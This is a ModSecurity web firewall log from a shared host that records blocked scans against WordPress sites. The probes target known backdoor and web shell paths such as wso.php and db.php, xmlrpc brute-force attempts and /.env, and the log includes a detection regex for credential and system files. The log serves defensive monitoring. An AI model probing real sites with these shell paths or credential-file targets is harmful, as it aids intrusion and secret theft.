[Tue May 26 13:48:41.278048 2026] [security2:error] [pid 555743:tid 555924] [client 2.58.56.196:63516] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/wp-plain.php"] [unique_id "ahVXYcjqAquC0YaxQjCtAQAAAT0"], referer: www.google.com
[Tue May 26 13:48:41.362552 2026] [security2:error] [pid 555743:tid 555906] [client 15.235.169.50:58443] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/themes/pridmag/db.php"] [unique_id "ahVXYcjqAquC0YaxQjCtAgAAASs"]
[Tue May 26 13:48:41.377841 2026] [security2:error] [pid 555743:tid 555918] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXYMjqAquC0YaxQjCs4QAAATc"]
[Tue May 26 13:48:41.824511 2026] [security2:error] [pid 560287:tid 560427] [client 15.235.169.50:58592] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/about.php"] [unique_id "ahVXYZmX5s6sDS3wJVcIhAAAAI4"]
[Tue May 26 13:48:41.910237 2026] [security2:error] [pid 560287:tid 560425] [client 20.205.111.246:2125] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/cache.php"] [unique_id "ahVXYZmX5s6sDS3wJVcIhgAAAIw"]
[Tue May 26 13:48:42.284130 2026] [security2:error] [pid 555743:tid 555907] [client 15.235.169.50:58694] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/about.php"] [unique_id "ahVXYsjqAquC0YaxQjCtFAAAASw"]
[Tue May 26 13:48:42.598195 2026] [security2:error] [pid 560287:tid 560438] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXYpmX5s6sDS3wJVcIiAAAAJk"]
[Tue May 26 13:48:42.613720 2026] [security2:error] [pid 560287:tid 560445] [client 20.205.111.246:2161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/content.php"] [unique_id "ahVXYpmX5s6sDS3wJVcIjQAAAJ8"]
[Tue May 26 13:48:42.747610 2026] [security2:error] [pid 560287:tid 560451] [client 15.235.169.50:58797] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/linkpreview/index.php"] [unique_id "ahVXYpmX5s6sDS3wJVcIjwAAAKU"]
[Tue May 26 13:48:42.871181 2026] [security2:error] [pid 560287:tid 560450] [client 2.58.56.196:50187] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.56.58.2.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "abrindoempresacurso.contabilidadecarioca.com.br"] [uri "/kragruem.php"] [unique_id "ahVXYpmX5s6sDS3wJVcIkAAAAKQ"], referer: www.google.com
[Tue May 26 13:48:43.231737 2026] [security2:error] [pid 555743:tid 555960] [client 15.235.169.50:58856] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/dropdown.php"] [unique_id "ahVXY8jqAquC0YaxQjCtKQAAAWE"]
[Tue May 26 13:48:43.361305 2026] [security2:error] [pid 555743:tid 555993] [client 20.205.111.246:6276] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/classwithtostring.php"] [unique_id "ahVXY8jqAquC0YaxQjCtLgAAAYI"]
[Tue May 26 13:48:43.709496 2026] [security2:error] [pid 560287:tid 560471] [client 15.235.169.50:58951] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/install.php"] [unique_id "ahVXY5mX5s6sDS3wJVcIlgAAALc"]
[Tue May 26 13:48:44.113450 2026] [security2:error] [pid 560287:tid 560478] [client 20.205.111.246:1605] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/css.php"] [unique_id "ahVXZJmX5s6sDS3wJVcInAAAAL4"]
[Tue May 26 13:48:44.178147 2026] [security2:error] [pid 560287:tid 560486] [client 15.235.169.50:59028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/content.php"] [unique_id "ahVXZJmX5s6sDS3wJVcInQAAAMU"]
[Tue May 26 13:48:44.644700 2026] [security2:error] [pid 555743:tid 555982] [client 173.252.69.116:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "theafterglow-centre.com"] [uri "/index.php"] [unique_id "ahVXZMjqAquC0YaxQjCtPwAAAXc"]
[Tue May 26 13:48:44.683677 2026] [security2:error] [pid 560287:tid 560510] [client 15.235.169.50:59108] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/amaxx.php"] [unique_id "ahVXZJmX5s6sDS3wJVcIqQAAANw"]
[Tue May 26 13:48:44.778816 2026] [security2:error] [pid 555743:tid 555913] [client 114.119.130.12:50501] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.cagmedya.com"] [uri "/trabzon-web-tasarim"] [unique_id "ahVXZMjqAquC0YaxQjCtRAAAATI"], referer: http://www.cagmedya.com/trabzon-web-tasarim
[Tue May 26 13:48:44.830243 2026] [security2:error] [pid 560287:tid 560497] [client 20.205.111.246:1633] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/chosen.php"] [unique_id "ahVXZJmX5s6sDS3wJVcIrQAAANA"]
[Tue May 26 13:48:44.929390 2026] [security2:error] [pid 555743:tid 555994] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXZMjqAquC0YaxQjCtPAAAAYM"]
[Tue May 26 13:48:45.163130 2026] [security2:error] [pid 560287:tid 560538] [client 15.235.169.50:59232] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/chosen.php"] [unique_id "ahVXZZmX5s6sDS3wJVcItwAAAPY"]
[Tue May 26 13:48:45.432622 2026] [security2:error] [pid 555743:tid 555945] [client 106.192.248.115:62415] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXZcjqAquC0YaxQjCtTgAAAVI"]
[Tue May 26 13:48:45.436739 2026] [security2:error] [pid 555743:tid 555945] [client 106.192.248.115:62415] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXZcjqAquC0YaxQjCtTgAAAVI"]
[Tue May 26 13:48:45.507198 2026] [security2:error] [pid 560287:tid 560540] [client 20.205.111.246:6379] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/doc.php"] [unique_id "ahVXZZmX5s6sDS3wJVcIvAAAAPg"]
[Tue May 26 13:48:45.637015 2026] [security2:error] [pid 560287:tid 560427] [client 15.235.169.50:59293] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/WordPressCore/include.php"] [unique_id "ahVXZZmX5s6sDS3wJVcIvgAAAI4"]
[Tue May 26 13:48:46.105367 2026] [security2:error] [pid 560287:tid 560419] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXZZmX5s6sDS3wJVcIwgAAAIY"]
[Tue May 26 13:48:46.125157 2026] [security2:error] [pid 555743:tid 555899] [client 15.235.169.50:59345] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/js/tinymce/plugins/compat3x/css/index.php"] [unique_id "ahVXZsjqAquC0YaxQjCtYgAAASQ"]
[Tue May 26 13:48:46.204424 2026] [security2:error] [pid 555743:tid 555936] [client 20.205.111.246:1983] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/elp.php"] [unique_id "ahVXZsjqAquC0YaxQjCtZgAAAUk"]
[Tue May 26 13:48:46.583413 2026] [security2:error] [pid 560287:tid 560472] [client 15.235.169.50:59418] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-signup.php"] [unique_id "ahVXZpmX5s6sDS3wJVcIzQAAALg"]
[Tue May 26 13:48:46.886406 2026] [security2:error] [pid 555743:tid 555962] [client 20.205.111.246:1620] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/Exception-class.php"] [unique_id "ahVXZsjqAquC0YaxQjCtcQAAAWM"]
[Tue May 26 13:48:47.082617 2026] [security2:error] [pid 555743:tid 555929] [client 15.235.169.50:59480] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp.php"] [unique_id "ahVXZ8jqAquC0YaxQjCteQAAAUI"]
[Tue May 26 13:48:47.221275 2026] [security2:error] [pid 560287:tid 560478] [client 129.222.147.134:31583] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXZ5mX5s6sDS3wJVcI3AAAAL4"]
[Tue May 26 13:48:47.221454 2026] [security2:error] [pid 560287:tid 560478] [client 129.222.147.134:31583] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXZ5mX5s6sDS3wJVcI3AAAAL4"]
[Tue May 26 13:48:47.274297 2026] [security2:error] [pid 560287:tid 560542] [client 20.206.67.134:5710] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVXZ5mX5s6sDS3wJVcI3QAAAPo"]
[Tue May 26 13:48:47.550592 2026] [security2:error] [pid 560287:tid 560521] [client 15.235.169.50:59544] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/cloud.php"] [unique_id "ahVXZ5mX5s6sDS3wJVcI4QAAAOc"]
[Tue May 26 13:48:47.614358 2026] [security2:error] [pid 560287:tid 560545] [client 20.205.111.246:6262] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/ee.php"] [unique_id "ahVXZ5mX5s6sDS3wJVcI5QAAAP0"]
[Tue May 26 13:48:47.689526 2026] [security2:error] [pid 555743:tid 555997] [client 141.98.11.171:55182] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "lmialumni.org"] [uri "/.env"] [unique_id "ahVXZ8jqAquC0YaxQjCthAAAAYY"]
[Tue May 26 13:48:48.019530 2026] [security2:error] [pid 555743:tid 555880] [client 15.235.169.50:59658] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/about.php"] [unique_id "ahVXaMjqAquC0YaxQjCtjQAAARE"]
[Tue May 26 13:48:48.304198 2026] [security2:error] [pid 555743:tid 555983] [client 20.205.111.246:1049] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/edit.php"] [unique_id "ahVXaMjqAquC0YaxQjCtlQAAAXg"]
[Tue May 26 13:48:48.411652 2026] [security2:error] [pid 555743:tid 555968] [client 114.119.148.237:41697] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVXaMjqAquC0YaxQjCtmAAAAWk"], referer: http://haddingtonwines.com/cart?remove_item=1731592aca5fb4d789c4119c65c10b4b
[Tue May 26 13:48:48.435078 2026] [security2:error] [pid 555743:tid 555980] [client 141.98.11.171:16852] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "lmialumni.org"] [uri "/.env"] [unique_id "ahVXaMjqAquC0YaxQjCtmQAAAXU"]
[Tue May 26 13:48:48.505546 2026] [security2:error] [pid 555743:tid 555954] [client 15.235.169.50:59758] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/css/colors/blue/"] [unique_id "ahVXaMjqAquC0YaxQjCtnQAAAVs"]
[Tue May 26 13:48:48.630218 2026] [security2:error] [pid 555743:tid 555979] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXaMjqAquC0YaxQjCtlAAAAXQ"]
[Tue May 26 13:48:48.983051 2026] [security2:error] [pid 555743:tid 555950] [client 15.235.169.50:59826] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/index.php"] [unique_id "ahVXaMjqAquC0YaxQjCtpAAAAVc"]
[Tue May 26 13:48:49.032159 2026] [security2:error] [pid 560287:tid 560488] [client 20.205.111.246:1579] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/f35.php"] [unique_id "ahVXaZmX5s6sDS3wJVcI-QAAAMc"]
[Tue May 26 13:48:49.470217 2026] [security2:error] [pid 555743:tid 555964] [client 15.235.169.50:59905] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/plugins/revslider/includes/external/page/index.php"] [unique_id "ahVXacjqAquC0YaxQjCtqgAAAWU"]
[Tue May 26 13:48:49.842353 2026] [security2:error] [pid 555743:tid 555908] [client 20.205.111.246:1915] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/fff.php"] [unique_id "ahVXacjqAquC0YaxQjCttwAAAS0"]
[Tue May 26 13:48:49.963549 2026] [security2:error] [pid 555743:tid 555945] [client 15.235.169.50:60008] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/class-wp-page-icon.php"] [unique_id "ahVXacjqAquC0YaxQjCtugAAAVI"]
[Tue May 26 13:48:50.313069 2026] [security2:error] [pid 560287:tid 560521] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXaZmX5s6sDS3wJVcJCAAAAOc"]
[Tue May 26 13:48:50.469736 2026] [security2:error] [pid 560287:tid 560433] [client 15.235.169.50:60147] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/dropdown.php"] [unique_id "ahVXapmX5s6sDS3wJVcJDwAAAJQ"]
[Tue May 26 13:48:50.576525 2026] [security2:error] [pid 560287:tid 560425] [client 20.205.111.246:1971] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/ff1.php"] [unique_id "ahVXapmX5s6sDS3wJVcJFgAAAIw"]
[Tue May 26 13:48:50.956673 2026] [security2:error] [pid 560287:tid 560467] [client 15.235.169.50:60282] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/plugins.php"] [unique_id "ahVXapmX5s6sDS3wJVcJHAAAALQ"]
[Tue May 26 13:48:51.171066 2026] [security2:error] [pid 555743:tid 555943] [client 20.206.67.134:1298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/wp-plain.php"] [unique_id "ahVXa8jqAquC0YaxQjCt0QAAAVA"], referer: www.google.com
[Tue May 26 13:48:51.177357 2026] [security2:error] [pid 560287:tid 560480] [client 20.206.67.134:1435] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.67.206.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mosykay.com"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVXa5mX5s6sDS3wJVcJIQAAAL8"], referer: www.google.com
[Tue May 26 13:48:51.341696 2026] [security2:error] [pid 555743:tid 555927] [client 20.205.111.246:1649] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/flower.php"] [unique_id "ahVXa8jqAquC0YaxQjCt1gAAAUA"]
[Tue May 26 13:48:51.443019 2026] [security2:error] [pid 555743:tid 555879] [client 15.235.169.50:60411] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/item.php"] [unique_id "ahVXa8jqAquC0YaxQjCt1wAAARA"]
[Tue May 26 13:48:51.570472 2026] [security2:error] [pid 560287:tid 560446] [client 46.8.157.243:51259] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVXa5mX5s6sDS3wJVcJJAAAAKA"], referer: https://www.cagmedya.com/web-tasarim/
[Tue May 26 13:48:51.940748 2026] [security2:error] [pid 560287:tid 560489] [client 15.235.169.50:60555] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/uploads/zcache.php"] [unique_id "ahVXa5mX5s6sDS3wJVcJNgAAAMg"]
[Tue May 26 13:48:52.027410 2026] [security2:error] [pid 560287:tid 560528] [client 20.205.111.246:1551] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/file.php"] [unique_id "ahVXbJmX5s6sDS3wJVcJNwAAAO4"]
[Tue May 26 13:48:52.101773 2026] [security2:error] [pid 560287:tid 560519] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXa5mX5s6sDS3wJVcJMQAAAOU"]
[Tue May 26 13:48:52.528675 2026] [security2:error] [pid 560287:tid 560431] [client 15.235.169.50:60674] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-admin/wso.php"] [unique_id "ahVXbJmX5s6sDS3wJVcJSAAAAJI"]
